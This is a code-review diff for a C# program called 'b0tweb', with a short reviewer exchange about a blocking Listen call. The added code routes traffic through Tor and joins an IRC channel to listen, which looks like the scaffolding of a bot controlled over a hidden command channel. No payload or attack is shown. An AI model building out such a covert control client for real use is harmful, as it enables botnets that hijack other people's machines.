b0tweb/Program.cs

```diff
@@ -10,13 +10,24 @@ namespace b0tweb
     /// </summary>
     class Program
     {
+        private const string Channel = "#b0tweb";
+
         /// <summary>
         /// Default main function to start the program.
         /// </summary>
         /// <param name="args">The command line arguments.</param>
         public static void Main(string[] args)
         {
+            Console.WriteLine("Welcome to the b0tweb");
+
+            TorProxy proxy = new TorProxy();
+            proxy.Establish();
+
+            IRCConnectionController controller = new IRCConnectionController();
+            controller.Join(Program.Channel);
+            controller.Listen();
 
+            proxy.Disconnect();
```

Comment:
I haven't checked whether the irc listen command is a blocking command (I think it is). If it is, then clearly this can never be executed.

Reply:
It cannot, at the moment, but I assume the `Listen` will get a graceful shutdown at some point